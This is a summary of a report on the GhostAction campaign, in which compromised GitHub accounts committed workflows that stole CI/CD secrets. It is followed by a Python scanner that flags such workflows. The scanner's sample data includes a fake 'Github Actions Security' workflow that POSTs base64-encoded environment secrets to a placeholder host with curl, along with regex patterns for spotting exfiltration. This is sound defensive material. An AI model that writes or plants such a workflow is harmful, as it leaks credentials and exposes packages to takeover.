Author: Gaetan Ferry, Guillaume Valadon
Word count: 1497
Language: English
Hacker News points: None

Summary

GitGuardian uncovered the GhostAction campaign, a large-scale software supply chain attack in which 327 GitHub user accounts were compromised and used to commit malicious GitHub Actions workflows to 817 repositories, stealing 3,325 secrets from their CI/CD environments. The workflows were disguised under the name "Github Actions Security"; once triggered, they read the repositories' secrets, including PyPI tokens, npm tokens, DockerHub credentials, GitHub tokens and AWS access keys, and exfiltrated them with HTTP POST requests to an attacker-controlled endpoint. At the time of writing, no malicious packages had been published with the stolen credentials, but 24 packages remained at immediate risk of compromise. GitGuardian alerted the affected users, worked with the GitHub, npm and PyPI security teams, and kept monitoring for signs of further abuse. Developers are advised to audit who has access to their repositories, review recent workflow changes for unauthorized commits, treat any secret that a tampered workflow could read as compromised, and add further protections against similar attacks.
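As an added example (not code from GitGuardian's write-up), the following standard-library Python script implements the workflow audit the summary recommends: it scans `.github/workflows` files for the pattern the GhostAction workflows used, a workflow that expands repository secrets and POSTs them to a host outside an allowlist. The two embedded workflow files are constructed for the example, the collector hostname and the trusted-host allowlist are assumptions, and the regex-based approach is a triage heuristic rather than a YAML-accurate parser.

```python
"""Heuristic scan of GitHub Actions workflows for secret-exfiltration patterns.

Added example. Flags a workflow when it expands repository secrets
(${{ secrets.X }} or ${{ toJSON(secrets) }}) and also sends data with an HTTP
client to a host that is not on an allowlist. Standard library only.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
ALL_SECRETS = re.compile(r"\$\{\{\s*toJSON\(\s*secrets\s*\)\s*\}\}")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
HTTP_CLIENT = re.compile(r"\b(curl|wget|Invoke-WebRequest|Invoke-RestMethod|requests\.post|fetch)\b")
POST_FLAG = re.compile(
    r"(-X\s*POST|--request\s+POST|--data\b|--data-binary|--data-raw|-d\s|-F\s"
    r"|--upload-file|-T\s|--post-data|--post-file|-Method\s+Post)", re.I)

# Hosts a publishing workflow legitimately contacts (assumed allowlist for this example).
TRUSTED_HOSTS = {"github.com", "api.github.com", "uploads.github.com",
                 "registry.npmjs.org", "upload.pypi.org", "pypi.org", "index.docker.io"}


@dataclass(frozen=True)
class Finding:
    path: str
    workflow_name: str
    secrets: Tuple[str, ...]
    external_hosts: Tuple[str, ...]
    reasons: Tuple[str, ...]


def workflow_name(text: str) -> str:
    # Top-level "name:" only; step names are indented and do not match ^name:.
    m = re.search(r"^name:\s*['\"]?(.+?)['\"]?\s*$", text, re.M)
    return m.group(1) if m else "<unnamed>"


def scan_workflow(path: str, text: str) -> Optional[Finding]:
    secrets = tuple(sorted(set(SECRET_REF.findall(text))))
    dumps_all = bool(ALL_SECRETS.search(text))
    hosts = tuple(sorted({h.lower() for h in URL_HOST.findall(text)} - TRUSTED_HOSTS))
    sends_out = bool(hosts) and bool(HTTP_CLIENT.search(text)) and bool(POST_FLAG.search(text))

    reasons: List[str] = []
    if dumps_all:
        reasons.append("expands the entire secrets context with toJSON(secrets)")
    if sends_out and (secrets or dumps_all):
        reasons.append("POSTs data to non-allowlisted host(s) in a workflow that also expands secrets")
    if len(secrets) >= 4:
        reasons.append(f"references {len(secrets)} distinct secrets; publish workflows usually need one or two")
    if not reasons:
        return None
    return Finding(path, workflow_name(text), secrets, hosts, tuple(reasons))


def scan_workflows(files: Dict[str, str]) -> List[Finding]:
    """files maps workflow path -> file contents; returns one Finding per suspicious workflow."""
    return [f for f in (scan_workflow(p, t) for p, t in sorted(files.items())) if f]


# Constructed sample input: one legitimate publish workflow and one mimicking the
# GhostAction pattern. collector.example.net is an example hostname, not a real endpoint.
SAMPLE_WORKFLOWS = {
    ".github/workflows/publish.yml": """\
name: Publish to PyPI
on:
  release:
    types: [published]
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: python -m build
      - uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_API_TOKEN }}
""",
    ".github/workflows/security.yml": """\
name: Github Actions Security
on:
  push:
  workflow_dispatch:
jobs:
  security:
    runs-on: ubuntu-latest
    steps:
      - name: Security check
        env:
          PYPI: ${{ secrets.PYPI_API_TOKEN }}
          NPM: ${{ secrets.NPM_TOKEN }}
          DOCKER: ${{ secrets.DOCKERHUB_PASSWORD }}
          AWS_KEY: ${{ secrets.AWS_ACCESS_KEY_ID }}
          AWS_SECRET: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        run: |
          curl -s -X POST -d "$(env | base64)" https://collector.example.net/report
""",
}

if __name__ == "__main__":
    for finding in scan_workflows(SAMPLE_WORKFLOWS):
        print(f"{finding.path} ({finding.workflow_name!r})")
        for reason in finding.reasons:
            print(f"  - {reason}")
        print(f"  secrets: {', '.join(finding.secrets)}")
        print(f"  external hosts: {', '.join(finding.external_hosts)}")
```

Point the script at the real workflow directory of every repository in scope (for example by walking `.github/workflows` in a checkout and feeding each file to `scan_workflows`) and review every hit against the commit history; a hit whose commit came from an account that had no business editing CI configuration is the strongest signal this campaign left behind.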